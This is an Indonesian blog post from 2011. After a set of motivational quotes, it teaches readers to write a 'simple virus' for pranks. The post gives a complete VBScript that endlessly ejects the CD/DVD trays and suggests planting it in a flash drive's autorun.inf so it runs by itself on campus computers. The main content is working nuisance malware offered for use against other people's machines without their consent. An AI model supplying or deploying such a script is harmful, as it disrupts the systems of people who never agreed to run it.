"Bermimpilah Anda setinggi langit… karena seandainya Anda terjatuh, maka anda akan terjatuh di antara bintang2' "Kerja keras memang mengeluarkan keringat.. tapi tak ada orang yg mati tenggelam dalam lautan keringat' "ika keras terhadap diri sendiri, dunia akan lunak padamu. Bila lunak terhadap diri sendiri, dunia akan keras terhadapmu' “Bila Anda menginginkan sesuatu dan tidak memperolehnya, berarti anda tidak sungguh2 menginginkannya' "Menaklukkan ribuan orang belum bisa disebut sebagai pemenang, tetapi mampu mengalahkan diri sendiri itulah yang disebut penakluk gemilang' "Jika seseorang sungguh-sungguh ingin melindungi sesuatu yang berhaga baginya, maka dia akan menjadi “kuat”!!

19 Apr 2011

Trik membuat virus sederhana


Yuk kita buat virus sederhana untuk ngerjai orang..”
Caranya: Buka notepad dan masukkan code berikut,

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Simpanlah dengan file tadi dengan ekstensi file iseng.vbs ato apapun nama kesukaan asalkan pastikan ekstensinya .vbs, dan jalankan filenya ( Klik 2x), perhatikan CD/DVD ROM akan terbuka/tertutup dengan sendirinya tanpa henti. 

Salah satu cara menghentikan aksi Virus Nakal ini ialah dengan menekan tombol CRTL+ALT+DEL dan matikan proses wscripts.exe, Kalo mau keren lagi, masukkan ke file autorun.inf di flashdisk anda, jadi setiap loe colokin ke kompie kampus, maka akan otomatis dijalankan “Virus” Nakal ini.
Ada pertanyaan."
                             


Tidak ada komentar:

Posting Komentar